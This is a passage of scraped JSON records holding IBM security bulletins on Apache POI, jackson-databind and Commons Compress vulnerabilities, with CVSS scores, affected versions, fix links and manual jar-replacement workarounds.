.,lib/poi-3.12-20150511.jar,lib/poi-ooxml-3.12-20150511.jar,\n\nlib/poi-ooxml-schemas-3.12-20150511.jar,\n\nlib/xmlbeans-2.6.0.jar\n\ntype\n\nBundle-ClassPath: .,lib/poi-3.17.jar,lib/poi-ooxml-3.17.jar,\n\nlib/poi-ooxml-schemas-3.17.jar,lib/xmlbeans-2.6.0.jar,\n\nlib/curvesapi-1.04.jar,lib/commons-collections4-4.1.jar\n\nMake sure that there are spaces at the beginning of the second and the third line\n\n\\- Save changes, close the archiver, and rename com.ibm.bi.core.poi_2.1.7.20170216.zip \n\nto\n\ncom.ibm.bi.core.poi_2.1.7.20170216.jar\n\n4\\. In the DataQuant for Workstation\\plugins folder, rename \n\ncom.ibm.rsbi.textanalytics.doc_2.1.7.20170216.jar \n\nto \n\ncom.ibm.rsbi.textanalytics.doc_2.1.7.20170216.zip and open it in the archiver.\n\n\\- Remove everything from the \"lib\" folder\n\n\\- Copy the poi-3.17.jar,poi-ooxml-3.17.jar,poi-ooxml-schemas-3.17.jar,xmlbeans-2.6.0.jar files into the \"lib\" folder\n\n\\- Modify META-INF\\MANIFEST-MF file. \n\nInstead of\n\nBundle-ClassPath: .,lib/poi-3.12-20150511.jar,lib/poi-ooxml-3.12-20150511.jar,\n\nlib/poi-ooxml-schemas-3.12-20150511.jar,lib/poi-scratchpad-3.12-20150511.jar\n\ntype\n\nBundle-ClassPath: .,lib/poi-3.17.jar,lib/poi-ooxml-3.17.jar,\n\nlib/poi-ooxml-schemas-3.17.jar,lib/xmlbeans-2.6.0.jar\n\nMake sure that there is a space at the beginning of the second line\n\n-Save changes, close the archiver, and rename com.ibm.rsbi.textanalytics.doc_2.1.7.20170216.zip \n\nto \n\ncom.ibm.rsbi.textanalytics.doc_2.1.7.20170216.jar\n\n5\\. In the DataQuant for Workstation\\plugins\\com.ibm.bi.thirdparty_2.1.7.20170216 folder\n\n\\- Remove commons-codec-1.6.jar and commons-logging-1.1.3.jar from the \"Other\" folder\n\n\\- Copy commons-codec-1.10.jar and commons-logging-1.2.jar into the the \"Other\" folder\n\n\\- Modify META-INF\\MANIFEST.MF. \n\nInstead of\n\nBundle-ClassPath: Other/mail.jar,\n\nOther/DPDFGen.jar,Other/js.jar,\n\nOther/ commons-logging-1.1.3.jar,\n\nOther/httpclient-4.3.1.jar,\n\nOther/httpcore-4.3.jar,\n\nOther/commons-codec-1.6.jar,Other/pdfbox-1.7.0.jar,\n\nOther/fontbox-1.7.0.jar,Other/jackson-annotations-2.2.2.jar,\n\nOther/jackson-core-2.2.2.jar,Other/jackson-databind-2.2.2.jar,\n\nOther/httpmime-4.3.jar\n\ntype\n\nBundle-ClassPath: Other/mail.jar,\n\nOther/DPDFGen.jar,Other/js.jar,\n\nOther/commons-logging-1.2.jar,\n\nOther/httpclient-4.3.1.jar,\n\nOther/httpcore-4.3.jar,\n\nOther/commons-codec-1.10.jar,Other/pdfbox-1.7.0.jar,\n\nOther/fontbox-1.7.0.jar,Other/jackson-annotations-2.2.2.jar,\n\nOther/jackson-core-2.2.2.jar,Other/jackson-databind-2.2.2.jar,\n\nOther/httpmime-4.3.jar\n\nMake sure that there are spaces at the beginning of each line (with the exception of the first line)\n\n\\- Save changes\n\n6\\. Run Data Quant for Workstation with the following command line parameters:\n\ndataquant.exe -clean -clearPersistedState\n\n7\\. For DataQuant for WebSphere\\DataQuantWebSphere21.war, rename DataQuantWebSphere21.war to DataQuantWebSphere21.zip and open it in the file archiver.\n\nMake the changes described in steps #3 and #5 inside the DataQuantWebSphere21.zip\\WEB-INF\\eclipse\\plugins folder or replace the existing com.ibm.bi.core.poi_2.1.7.20170216.jar and com.ibm.bi.thirdparty_2.1.7.20170216 folders with the updated ones from the workstation version\n\n\\- Close file archiver\n\n\\- Rename DataQuantWebSphere21.zip to DataQuantWebSphere21.war\n\n\\- Redeploy DataQuantWebSphere21.war on your web server\n\n8\\. For DataQuant for WebSphere\\DataQuantWebSphere21.ear, rename DataQuantWebSphere21.ear \n\nto \n\nDataQuantWebSphere21.zip and open it in the file archiver.\n\nMake the changes described in step #7 for the DataQuantWebSphere21.war file which is inside the DataQuantWebSphere21.zip archive\n\nor\n\nreplace the existing DataQuantWebSphere21.war with the updated DataQuantWebSphere21.war from step #7\n\n\\- Close file archiver\n\n\\- Rename DataQuantWebSphere21.zip to DataQuantWebSphere21.ear\n\n\\- Redeploy DataQuantWebSphere21.ear on your web server\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-02-12T21:24:38", "type": "ibm", "title": "Security Bulletin: Public disclosured vulnerability from Apache POI", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2021-02-12T21:24:38", "id": "DA6CCDF86949C91E3CDB7DD6338939531CDDAC3BE2000984206A1C2A539B8AD4", "href": "https://www.ibm.com/support/pages/node/725965", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T05:44:04", "description": "## Summary\n\nIBM Tivoli Netcool Service Quality Manager (TNSQM) is affected by an Open Source Apache POI vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2017-12626_](<https://vulners.com/cve/CVE-2017-12626>)** \nDESCRIPTION: **Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/138361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Tivoli Netcool Service Quality Manager 4.1.4\n\n## Remediation/Fixes\n\nNone. See workaround or contact IBM support\n\n## Workarounds and Mitigations\n\nDownload latest [Apache POI](<http://poi.apache.org/download.html>). Follow below instructions to replace the Apache POI jar files in IBM Tivoli Netcool Service Quality Manager 4.1.4. \n1) Stop Oracle and TNSQM \n2) Switch to the same user who installed the product, for example user \"saserver\", and locate the install directory, for example /appl/ \n3) Backup and remove all poi*.jar files from these locations: \noracle/product/11.2.0/db_1/sqldeveloper/sqldeveloper/lib \nsa/lib/tp \n4) Copy the latest poi*.jar files to the above locations. \n5) Start Oracle and TNSQM\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-17T15:50:47", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool Service Quality Manager is affected by an Open Source Apache POI vulnerability (CVE-2017-12626)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-06-17T15:50:47", "id": "CDF8726CAC4FB89641972BE5C7E766A6A5B672703DBCD02B09164ED4A59A37D1", "href": "https://www.ibm.com/support/pages/node/569053", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T05:38:58", "description": "## Summary\n\nIBM SPSS Statistics has addressed the following vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2017-12626_](<https://vulners.com/cve/CVE-2017-12626>)** \nDESCRIPTION: **Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/138361_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM SPSS Statistics**\n\n| \n\n**Affected Versions** \n \n---|--- \nSPSS Statistics| 21.0.0.2 \nSPSS Statistics| 22.0.0.2 \nSPSS Statistics| 23.0.0.3 \nSPSS Statistics| 24.0.0.2 \nSPSS Statistics| 25.0.0.1 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**APAR**\n\n| \n\n**Remediation / First Fix** \n \n---|---|---|--- \nSPSS Statistics| 21.0.0.2| None| Install [_Statistics 21 FP002 IF015_](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=21.0.0.2&platform=All&function=fixId&fixids=21.0-IM-S21STAT-ALL-FP002-IF015&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nSPSS Statistics| 22.0.0.2| None| Install [_Statistics 22 FP002 IF016_](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=22.0.0.2&platform=All&function=fixId&fixids=22.0-IM-S22STAT-ALL-FP002-IF016&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nSPSS Statistics| 23.0.0.3| None| Install [_Statistics 23 FP003 IF012_](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=23.0.0.3&platform=All&function=fixId&fixids=23.0-IM-S23STAT-ALL-FP003-IF012&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nSPSS Statistics| 24.0.0.2| None| Install [_Statistics 24 FP002 IF009_](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=24.0.0.2&platform=All&function=fixId&fixids=24.0-IM-S24STAT-ALL-FP002-IF009&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \nSPSS Statistics| 25.0.01| None| Install [_Statistics 25 FP001 IF004_](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Statistics&release=25.0.0.1&platform=All&function=fixId&fixids=25.0-IM-S25STAT-ALL-FP001-IF004&includeRequisites=1&includeSupersedes=0&downloadMethod=http>) \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-04-13T14:43:07", "type": "ibm", "title": "Security Bulletin: \nIBM SPSS Statistics is affected by an Apache Poi vulnerability (CVE-2017-12626)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2020-04-13T14:43:07", "id": "954F19165902A68FCC586E55B2FBAD28E4C66C71F4AECE8D5047BBAA35ABBC06", "href": "https://www.ibm.com/support/pages/node/568869", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T21:44:40", "description": "## Summary\n\nIBM OpenPages GRC Platform has addressed Apache POI vulnerability (CVE-2017-12626)\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2017-12626](<https://vulners.com/cve/CVE-2017-12626>) \n**DESCRIPTION: **Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/138361> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM OpenPages GRC Platform versions 7.3 through 8.0\n\n## Remediation/Fixes\n\nA fix has been created for each affected version of the named product. Download and install the fix as soon as possible. Fixes and installation instructions are provided at the URLs listed below: \n\n\n**Product** | **VRMF** | **Remediation/First Fix** \n---|---|--- \nIBM OpenPages GRC Platform **8.0** \n| 8.0.0.2 | <https://www.ibm.com/support/docview.wss?uid=ibm10744175> \nIBM OpenPages GRC Platform** 7.3.0 ** \n| 7.3.0.3 | <https://www.ibm.com/support/docview.wss?uid=ibm10794867> \n \n## Workarounds and Mitigations\n\nNone known, apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-02-01T21:20:02", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform is affected by Apache POI vulnerability (CVE-2017-12626)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2019-02-01T21:20:02", "id": "9D37182D92DF6AA8FA1CBC82F99316BF0499E63FFA722F6D8E8797E6C70FE0E5", "href": "https://www.ibm.com/support/pages/node/728739", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T21:48:55", "description": "## Summary\n\nApache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception.\n\n## Vulnerability Details\n\nCVEID: [CVE-2017-12626](<https://vulners.com/cve/CVE-2017-12626>) \nDESCRIPTION: Apache POI is vulnerable to a denial of service, caused by an error while parsing malicious WMF, EMF, MSG and macros and specially crafted DOC, PPT and XLS. By persuading a victim to open a specially crafted file, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop or an out of memory exception. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See [https://exchange.xforce.ibmcloud.com/vulnerabilities/138361](<https://exchange.xforce.ibmcloud.com/vulnerabilities/138361>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM eDiscovery Manager v2.2.2.3\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRM** | **Remediation** \n---|---|--- \nIBM eDiscovery Manager | 2.2.2.3 | Use IBM eDiscovery Manager 2.2.2.3 [Interim Fix 001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+eDiscovery+Manager&fixids=2.2.2.3-EDM-AIX-IF001&source=SAR>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-06T16:33:54", "type": "ibm", "title": "Security Bulletin: eDiscovery Manager is affected by public disclosed vulnerability from Apache Poi", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12626"], "modified": "2018-08-06T16:33:54", "id": "F0CF06A35CFB9F883DE74CA58FDA5FB8E4CD4EED75B2FA4B80389117E7AAC99D", "href": "https://www.ibm.com/support/pages/node/719481", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-24T01:38:45", "description": "## Summary\n\nSecurity vulnerabilities affect IBM Cloud Object Storage SDK Java. These vulnerabilities have been addressed in the latest SDK 2.5.5 release.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-16335](<https://vulners.com/cve/CVE-2019-16335>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to com.zaxxer.hikari.HikariDataSource. This is a different vulnerability than CVE-2019-14540. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167205>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n\n** CVEID: **[CVE-2019-17267](<https://vulners.com/cve/CVE-2019-17267>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n** CVEID: **[CVE-2019-16943](<https://vulners.com/cve/CVE-2019-16943>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the p6spy (3.8.6) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of com.p6spy.engine.spy.P6DataSource mishandling. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168255](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168255>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n** CVEID: **[CVE-2019-16942](<https://vulners.com/cve/CVE-2019-16942>) \n**DESCRIPTION: **A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.10. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the commons-dbcp (1.4) jar in the classpath, and an attacker can find an RMI service endpoint to access, it is possible to make the service execute a malicious payload. This issue exists because of org.apache.commons.dbcp.datasources.SharedPoolDataSource and org.apache.commons.dbcp.datasources.PerUserPoolDataSource mishandling. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168254](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168254>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID: **CVE-2019-14540 \n**DESCRIPTION: **FasterXML jackson-databind could allow a remote attacker to obtain sensitive information, caused by a polymorphic typing issue in com.zaxxer.hikari.HikariConfig. A remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/167354 for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nCOS SDK Java | Prior to 2.5.5 \n \n## Remediation/Fixes\n\n**_IBM COS SDK Releases_** **IBM COS SDK Releases** | **Link to Fix / Fix Availability Target** \n---|--- \n[COS SDK Java 2.5.5](<https://github.com/IBM/ibm-cos-sdk-java/tree/2.4.2>) | \n\n<https://github.com/IBM/ibm-cos-sdk-java/tree/2.5.5> \n \n## Workarounds and Mitigations\n\n**_IBM COS SDK Releases_** **IBM COS SDK Releases** | **Link to Fix / Fix Availability Target** \n---|--- \n[COS SDK Java 2.5.5](<https://github.com/IBM/ibm-cos-sdk-java/tree/2.4.2>) | \n\n<https://github.com/IBM/ibm-cos-sdk-java/tree/2.5.5> \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-17T17:16:46", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities affect IBM Cloud Object Storage SDK Java (November 2019 Bulletin)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14540", "CVE-2019-16335", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17267"], "modified": "2020-01-17T17:16:46", "id": "FE682ECFC10CBB3EA19CC98A95397F776F34168220DD72550FAE4CF5E216A9CC", "href": "https://www.ibm.com/support/pages/node/1105671", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:45:57", "description": "## Summary\n\nApache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. IBM Network Performance Insight has addressed this. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2018-11771_](<https://vulners.com/cve/CVE-2018-11771>) \n**DESCRIPTION:** Apache Commons Compress is vulnerable to a denial of service, caused by the failure to return the correct EOF indication after the end of the stream has been reached by the ZipArchiveInputStream method. By reading a specially crafted ZIP archive, a remote attacker could exploit this vulnerability to cause the application to enter into an infinite loop. \nCVSS Base Score: 3.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/148429_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148429>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Network Performance Insight: 1.2.1, 1.2.2, 1.2.3.\n\n## Remediation/Fixes\n\n1.2.1.0-TIV-NPI-IF0002\n\nFix Central link: [_http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.1.0-TIV-NPI-IF0002&source=SAR_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.1.0-TIV-NPI-IF0002&source=SAR>) \n \n1.2.1.1-TIV-NPI-IF0003\n\nFix Central link: [_http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.1.1-TIV-NPI-IF0003&source=SAR_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.1.1-TIV-NPI-IF0003&source=SAR>) \n \n1.2.2.0-TIV-NPI-IF0005\n\nFix Central link: [_http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.2.0-TIV-NPI-IF0005&source=SAR_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.2.0-TIV-NPI-IF0005&source=SAR>) \n \n1.2.3.0-TIV-NPI-IF0003\n\nFix Central link: [_http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.3.0-TIV-NPI-IF0003&source=SAR_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FTivoli%2FNetwork+Performance+Insight&fixids=1.2.3.0-TIV-NPI-IF0003&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-11-12T03:50:01", "type": "ibm", "title": "Security Bulletin: IBM Network Performance Insight (CVE-2018-11771)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11771"], "modified": "2018-11-12T03:50:01", "id": "57B9CF39C18FB4A06D2E917933FA8D5E3C4A18F982A4708050D5715BD40B9C19", "href": "https://www.ibm.com/support/pages/node/739173", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-24T01:40:04", "description": "## Summary\n\nA vulnerability in Apache Commons Compress was addressed by IBM InfoSphere Information Server Cloud related connectors. \n\n## Vulnerability Details\n\n**CVEID:** 